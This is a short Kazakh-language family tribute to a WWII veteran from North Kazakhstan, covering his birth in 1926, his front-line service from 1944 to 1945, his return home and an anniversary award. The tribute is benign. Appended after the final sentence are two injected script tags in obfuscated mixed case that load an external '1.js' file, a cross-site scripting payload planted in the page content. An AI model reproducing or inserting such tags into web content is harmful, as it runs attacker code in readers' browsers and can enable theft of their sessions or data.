Кожахметов Жанахмет - 1926 жылы қазіргі Солтүстік Қазақстан облысы, Айыртау ауданы, Шолақ өзек ауылында дүниеге келген. 1944 жылы 18 келген шағында Отанын, елін, жерін қорғау үшін майданға аттанады. Жан аямай елін қорғайды. 1945 жылы бейбітшілік таңын көрген атамыз, еліне аман есен оралады. Небір зұлмат уақытты бастан кешірген атамыз, соғыстан кейін өз елінде қызмет етеді. Ұлы Отан соғысындағы Жеңістің 60 жылдығына орай Айыртау ауданының әкімінің - Б.Төлегеннің қолынан төсбелгімен марапатталады. Бейбіт заман үшін, ашық соғыссыз аспанымыз үшін атамызға және олардың майдандағы достарына, бауырларына мың алғыс. Жанахмет атамыздан тараған әулетінің атынан.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>